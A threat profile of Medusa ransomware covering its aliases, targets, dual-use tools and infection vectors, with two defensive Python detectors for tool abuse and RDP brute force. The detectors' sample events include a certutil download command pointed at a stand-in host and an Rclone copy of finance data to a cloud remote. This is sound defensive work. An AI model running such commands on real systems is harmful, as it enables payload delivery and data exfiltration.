Medusa Ransomware
Description
Unconnected to MedusaLocker or the Medusa mobile malware, Medusa ransomware was first observed in 2021 as a closed operation run by a small group and has since evolved into a RaaS (Ransomware-as-a-Service) affiliate model. Medusa practices "double extortion": victim data is exfiltrated and then encrypted, with a threat to publish the stolen data if the ransom is not paid.
Medusa is known to purchase access from IABs (Initial Access Brokers) rather than always breaching victims directly. The group is also notably aggressive, posting large numbers of victims to its leak site on a regular basis. It favors LOTL (Living Off The Land) tactics to stay hidden inside networks, relying on built-in Windows utilities, and uses a variety of legitimate remote access and deployment tools to maintain its presence. Because these tools are common in legitimate IT administration, detection generally depends on context (who installed them, from where, and what ran alongside them) rather than on the tool name alone.
Aliases
- White Kali
- Medusa Ransomware Operators
- FROZEN SPIDER
- Medusa Ransomware Group
- Medusa ransomware Operators
Common Vulnerabilities and Exposures
Targeted Industries
- Education
- Energy
- Finance
- Government
- Healthcare
- Manufacturing
- Retail
- Technology
- Transportation
Objectives
Data exfiltration and financial gain.
Known Tools Used
- CertUtil
- AnyDesk
- KillAVDriver
- KillAV
- Mesh Agent
- Navicat
- NetScan
- PDQ Deploy
- PDQ Inventory
- SimpleHelp
- Rclone
- Robocopy
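The tools above are almost all dual-use, so a practical first pass is to triage process-creation telemetry for the specific usage patterns that matter (certutil fetching or decoding a file, Rclone pushing to a configured remote, Robocopy touching a UNC share, a remote-access agent appearing on a host) and hand the hits to an analyst. The script below is an added example and is not code from CISA or any vendor; the binary-name fragments, command-line shapes and the sample events are assumptions constructed for illustration.

```python
"""Triage constructed Windows process-creation events for the tooling listed
on this page (certutil, Rclone, Robocopy, AnyDesk, Mesh Agent, SimpleHelp,
PDQ Deploy/Inventory, NetScan). Added example; binary names and command-line
patterns are assumptions, not vendor-confirmed indicators."""
from __future__ import annotations
import re
from collections import Counter
from dataclasses import dataclass


@dataclass(frozen=True)
class Finding:
    event_id: int
    rule: str
    detail: str


# Assumed binary-name fragments for the remote access / deployment tools on
# the page. Affiliates rename or repackage binaries, so treat a miss as
# "not observed", never "not present".
REMOTE_TOOL_KEYWORDS = {
    "anydesk": "AnyDesk",
    "meshagent": "Mesh Agent",
    "simplehelp": "SimpleHelp",
    "pdqdeploy": "PDQ Deploy",
    "pdqinventory": "PDQ Inventory",
    "netscan": "NetScan",
}

# certutil switches commonly abused to fetch or decode payloads.
CERTUTIL_ABUSE = re.compile(r"-(urlcache|decode|encode)\b", re.IGNORECASE)
# Rclone transfer verb plus a configured remote ("name:path"). A remote name
# needs 2+ characters before the colon, so a drive letter like C:\ does not match.
RCLONE_VERB = re.compile(r"\b(copy|sync|move|copyto|moveto)\b", re.IGNORECASE)
RCLONE_REMOTE = re.compile(r"\s([A-Za-z][\w-]+):")
# Robocopy reading from or writing to a UNC share (staging for exfiltration).
UNC_PATH = re.compile(r"\\\\[^\\\s]+\\")


def triage(event: dict) -> list[Finding]:
    """Return zero or more findings for one process-creation event."""
    eid = event["EventId"]
    image = (event.get("Image") or "").lower()
    base = image.rsplit("\\", 1)[-1]
    cmd = event.get("CommandLine") or ""
    found: list[Finding] = []
    if base == "certutil.exe" and CERTUTIL_ABUSE.search(cmd):
        found.append(Finding(eid, "certutil-ingress", cmd))
    if base == "rclone.exe":
        exfil = RCLONE_VERB.search(cmd) and RCLONE_REMOTE.search(cmd)
        found.append(Finding(eid, "rclone-exfil" if exfil else "rclone-present", cmd))
    if base == "robocopy.exe" and UNC_PATH.search(cmd):
        found.append(Finding(eid, "robocopy-unc", cmd))
    for key, name in REMOTE_TOOL_KEYWORDS.items():
        if key in base:
            found.append(Finding(eid, "remote-access-tool", f"{name}: {image}"))
    return found


def triage_all(events) -> list[Finding]:
    return [f for e in events for f in triage(e)]


def rule_counts(events) -> dict:
    """Rule name -> number of hits, for a quick summary of a batch."""
    return dict(Counter(f.rule for f in triage_all(events)))


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"EventId": 1, "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://files.example.invalid/a.txt C:\ProgramData\a.txt"},
    {"EventId": 2, "Image": r"C:\Windows\System32\certutil.exe",
     "CommandLine": r"certutil.exe -verify C:\certs\corp.cer"},
    {"EventId": 3, "Image": r"C:\ProgramData\rclone.exe",
     "CommandLine": r'rclone.exe copy "C:\Finance\Q3" s3remote:finance-q3 --transfers 8'},
    {"EventId": 4, "Image": r"C:\Windows\System32\Robocopy.exe",
     "CommandLine": r"robocopy.exe \\fs01\finance C:\staging /E /Z"},
    {"EventId": 5, "Image": r"C:\Users\svc\AppData\Roaming\AnyDesk\AnyDesk.exe",
     "CommandLine": "AnyDesk.exe --install C:\\Users\\svc\\AppData\\Roaming\\AnyDesk --silent"},
    {"EventId": 6, "Image": r"C:\Program Files\Mesh Agent\MeshAgent.exe",
     "CommandLine": "MeshAgent.exe -fullinstall"},
    {"EventId": 7, "Image": r"C:\Windows\System32\notepad.exe",
     "CommandLine": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    for f in triage_all(SAMPLE_EVENTS):
        print(f"event {f.event_id}: {f.rule}: {f.detail}")
    print(rule_counts(SAMPLE_EVENTS))
```

The findings are triage candidates, not verdicts: every rule here will also fire on legitimate administration (a help desk installing AnyDesk, a backup job running Robocopy against a share), so the value comes from correlating hits on one host within a short window and checking the installing account and parent process. Rclone merely being present already deserves a look because it is rarely part of a standard workstation build.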
Known Infection Vectors
- Compromised VPNs
- Exploiting CVEs
- Malicious Attachments
- Phishing Emails
- RDP Brute-Force
- Supply Chain Attacks
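Of the vectors above, RDP brute force is the one a defender can detect directly from Windows Security logs: a burst of 4625 failures (LogonType 10, RemoteInteractive) from one source address inside a short window, and, worse, a 4624 success from the same address afterwards. The sliding-window detector below is an added example, not from the page's sources; the threshold, window, the simplified key=value event format and the sample lines are all constructed assumptions.

```python
"""Sliding-window RDP brute-force detection over constructed Windows Security
events (4625 = failed logon, 4624 = successful logon, LogonType 10 =
RemoteInteractive). Added example; the key=value line format stands in for
real EVTX/XML, and the threshold and window are assumptions to tune."""
from __future__ import annotations
from collections import defaultdict, deque
from dataclasses import dataclass
from datetime import datetime, timedelta

RDP_LOGON_TYPE = "10"
FAIL_THRESHOLD = 5            # assumption: failures per source IP before alerting
WINDOW = timedelta(minutes=5)  # assumption: sliding window length


@dataclass(frozen=True)
class Alert:
    source_ip: str
    kind: str            # "brute-force" or "brute-force-success"
    first_seen: datetime
    last_seen: datetime
    failures: int
    users: tuple         # distinct target accounts seen in the failure burst
    succeeded_as: str    # account that later logged on, or "" for a pure burst


def parse(line: str) -> dict:
    """Parse one constructed 'key=value key=value' line into a dict."""
    fields = dict(tok.split("=", 1) for tok in line.split())
    fields["time"] = datetime.fromisoformat(fields["time"])
    return fields


def detect(lines) -> list[Alert]:
    """Alert once per source IP when failures in WINDOW reach FAIL_THRESHOLD,
    and again if that IP later completes an RDP logon."""
    events = sorted((parse(l) for l in lines), key=lambda e: e["time"])
    recent = defaultdict(deque)   # ip -> deque of (time, user) failures in window
    bursts: dict[str, Alert] = {}  # ip -> brute-force alert already raised
    alerts: list[Alert] = []
    for e in events:
        if e.get("LogonType") != RDP_LOGON_TYPE:
            continue  # only RemoteInteractive logons are in scope here
        ip = e["IpAddress"]
        if e["EventID"] == "4625":
            q = recent[ip]
            q.append((e["time"], e["TargetUserName"]))
            while q and e["time"] - q[0][0] > WINDOW:
                q.popleft()  # drop failures that fell out of the window
            if len(q) >= FAIL_THRESHOLD and ip not in bursts:
                a = Alert(ip, "brute-force", q[0][0], e["time"], len(q),
                          tuple(sorted({u for _, u in q})), "")
                bursts[ip] = a
                alerts.append(a)
        elif e["EventID"] == "4624" and ip in bursts:
            prior = bursts[ip]
            alerts.append(Alert(ip, "brute-force-success", prior.first_seen,
                                e["time"], prior.failures, prior.users,
                                e["TargetUserName"]))
    return alerts


# Constructed sample log lines (not real events). 203.0.113.10 fails five times
# in under two minutes, then succeeds; 198.51.100.7 stays under the threshold.
SAMPLE_LINES = [
    "time=2025-03-12T02:00:00 EventID=4625 LogonType=10 IpAddress=203.0.113.10 TargetUserName=administrator",
    "time=2025-03-12T02:00:20 EventID=4625 LogonType=10 IpAddress=203.0.113.10 TargetUserName=administrator",
    "time=2025-03-12T02:00:41 EventID=4625 LogonType=10 IpAddress=203.0.113.10 TargetUserName=admin",
    "time=2025-03-12T02:01:05 EventID=4625 LogonType=10 IpAddress=198.51.100.7 TargetUserName=jdoe",
    "time=2025-03-12T02:01:10 EventID=4625 LogonType=10 IpAddress=203.0.113.10 TargetUserName=svc_backup",
    "time=2025-03-12T02:01:33 EventID=4625 LogonType=10 IpAddress=203.0.113.10 TargetUserName=svc_backup",
    "time=2025-03-12T02:01:58 EventID=4625 LogonType=10 IpAddress=203.0.113.10 TargetUserName=svc_backup",
    "time=2025-03-12T02:02:30 EventID=4624 LogonType=3 IpAddress=203.0.113.10 TargetUserName=svc_backup",
    "time=2025-03-12T02:02:45 EventID=4624 LogonType=10 IpAddress=203.0.113.10 TargetUserName=svc_backup",
    "time=2025-03-12T02:03:00 EventID=4625 LogonType=10 IpAddress=198.51.100.7 TargetUserName=jdoe",
]

if __name__ == "__main__":
    for a in detect(SAMPLE_LINES):
        print(f"{a.kind}: {a.source_ip} failures={a.failures} users={a.users} "
              f"success_as={a.succeeded_as or '-'}")
```

The success alert is the one worth paging on: it means the credential guessed during the burst now works. The detector only considers LogonType 10, so a network (type 3) logon from the same address after the burst is ignored here; widening the success branch to type 3 as well catches an attacker who switches to SMB or WMI once the password is known, at the cost of more noise from scanners that never reach RDP.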
References
StopRansomware: Medusa Ransomware: https://www.cisa.gov/news-events/cybersecurity-advisories/aa25-071a